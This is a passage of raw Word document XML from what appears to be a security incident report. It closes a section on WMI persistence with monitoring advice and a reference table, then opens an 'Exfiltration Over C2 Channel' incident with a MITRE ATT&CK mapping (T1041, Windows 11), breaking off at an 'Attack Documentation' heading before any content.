          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC90980" w14:textId="30123CBB" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Monitoring + periodic audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CF49E" w14:textId="0C48E689" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Regular audit of root\subscription for unknown filters/consumers/bindings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD05D7" w14:textId="12B0F16B" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BB59A48" w:rsidP="6BB59A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>SIEM correlation rules for “WMI spawning PowerShell” patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4035D36F" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="004D5913" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc220896704"/>
      <w:commentRangeStart w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:commentRangeEnd w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="50"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3823"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8236E" w:rsidRPr="004D5913" w14:paraId="6B48E080" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BFD2A5B" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="004D5913" w:rsidRDefault="00B8236E" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description of Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A4EC783" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="004D5913" w:rsidRDefault="00B8236E" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8236E" w:rsidRPr="004D5913" w14:paraId="7A0BD20D" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D98EA0" w14:textId="6C9DEB6D" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="4E22224B" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK: Event Triggered Execution – Windows Management Instrumentation (T1546.003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66418157" w14:textId="4684301D" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="4E22224B" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId51">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1546/003/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8236E" w:rsidRPr="004D5913" w14:paraId="63C78D58" w14:textId="77777777" w:rsidTr="001B4A08">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328628B2" w14:textId="50C18DBD" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="29E5D3DD" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Event Log Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD404C3" w14:textId="235C1A38" w:rsidR="00B8236E" w:rsidRPr="00D01BC9" w:rsidRDefault="6BF21DC8" w:rsidP="001B4A08">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId52">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://wazuh.com/platform/overview/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2226C775" w14:paraId="42EA3F4B" w14:textId="77777777" w:rsidTr="2226C775">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB8109A" w14:textId="3F0B93ED" w:rsidR="2226C775" w:rsidRDefault="65BDD4F0" w:rsidP="2226C775">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Background on WMI namespaces and execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B4B3DE" w14:textId="30DFC692" w:rsidR="2226C775" w:rsidRDefault="2192430B" w:rsidP="2226C775">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId53">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="4D7FE1C7" w14:paraId="6BC53695" w14:textId="77777777" w:rsidTr="4D7FE1C7">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C6AEA3" w14:textId="645B941E" w:rsidR="4D7FE1C7" w:rsidRDefault="64F4EB37" w:rsidP="4D7FE1C7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Official Sysmon reference for detecting WMI persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47196DC6" w14:textId="1D6997A1" w:rsidR="4D7FE1C7" w:rsidRDefault="2C653FAE" w:rsidP="4D7FE1C7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId54">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="03ED2ED0" w14:paraId="39DA2740" w14:textId="77777777" w:rsidTr="03ED2ED0">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="543CE3D5" w14:textId="1D09D573" w:rsidR="03ED2ED0" w:rsidRDefault="70C448EA" w:rsidP="03ED2ED0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Red Canary – WMI Persistence Explained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A549C1" w14:textId="72F75F8C" w:rsidR="03ED2ED0" w:rsidRDefault="03ED2ED0" w:rsidP="03ED2ED0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId55">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://redcanary.com/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7986675F" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343891C3" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CAF31" w14:textId="25F3A0A9" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc220896705"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Incident #004 – Exfiltration Over C2 Channel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="2819E456" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="003419C9" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc220896706"/>
      <w:commentRangeStart w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="53"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1498"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8236E" w14:paraId="7B6DB542" w14:textId="77777777" w:rsidTr="2BFA4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Align w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="045982B3" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78F7BD21" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="531F8C5B" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C585227" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E"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Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63548CDD" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DACED4D" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E"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auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1875D8" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00B8236E" w:rsidP="001B4A0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color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13605" w14:paraId="4F51481D" w14:textId="77777777" w:rsidTr="2BFA4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Align w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ACFA45B" w14:textId="2ACB3FF0" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="000F10DF" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AE108CE" w14:textId="054A4599" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00094DDF" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="361BA732" w14:textId="03E35C12" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00E13605" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DE9F344" w14:textId="46D6A280" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="00E13605" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73266A31" w14:textId="23E45D33" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="007F6AF1" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27E6F034" w14:textId="0BE2B538" w:rsidR="00C05F84" w:rsidRDefault="2BFA4357" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>User/Admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C4C89F" w14:textId="15B3400F" w:rsidR="00B8236E" w:rsidRPr="009F3FA8" w:rsidRDefault="2BFA4357" w:rsidP="001B4A08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>(Depending on who can access the file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F4B0597" w14:textId="461E035E" w:rsidR="00ED5F9B" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc220896707"/>
      <w:commentRangeStart w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
